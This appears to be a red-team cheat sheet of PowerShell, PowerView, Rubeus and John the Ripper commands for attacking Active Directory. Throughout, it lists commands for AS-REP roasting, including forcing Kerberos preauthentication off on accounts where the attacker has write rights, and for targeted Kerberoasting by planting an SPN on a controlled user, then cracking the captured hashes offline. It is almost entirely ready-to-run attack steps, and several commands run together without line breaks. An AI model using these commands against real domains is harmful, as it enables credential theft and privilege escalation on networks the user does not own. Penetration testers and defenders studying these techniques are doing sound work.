If a user’s UAC setting has “Do not require Kerberos preauthentication” enabled i.e. Kerberos preauth is disabled, it is possible to grab user’s crackable AS-REP and brute force it offline. With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well.
Enumerating accounts with preauth disabled
Get-DomainUser -PreauthNotRequired -VerboseGet-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuthForce disable Kerberos Preauth
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "groupname"}
Set-DomainObject -Identity userofthatgroup -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreauthNotRequired -VerboseGet-ASREPHash -UserName username -VerboseInvoke-ASREPRoast -Verbosejohn.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txtLeveraging permissions to change a user’s SPN
- With enough rights (GenericAll/GenericWrite), a target user’s SPN can be set to anything (unique in domain).
- We can then request a TGS without special privileges. The TGS can then be Kerberoasted.
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "groupname"}Get-DomainUser -Identity userofthatgroup | select serviceprinciplenameGet-ADUser -Identity userofthatgroup -Properties ServicePrincipleName | select ServicePrincipleNameSet-DomainObject -Identity userofthatgroup -Set @{serviceprincipalname='service/serviceprovider'}Set-ADuser -Identity userofthatgroup -ServicePrincipleNames @{Add='service/serviceprovider'}Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt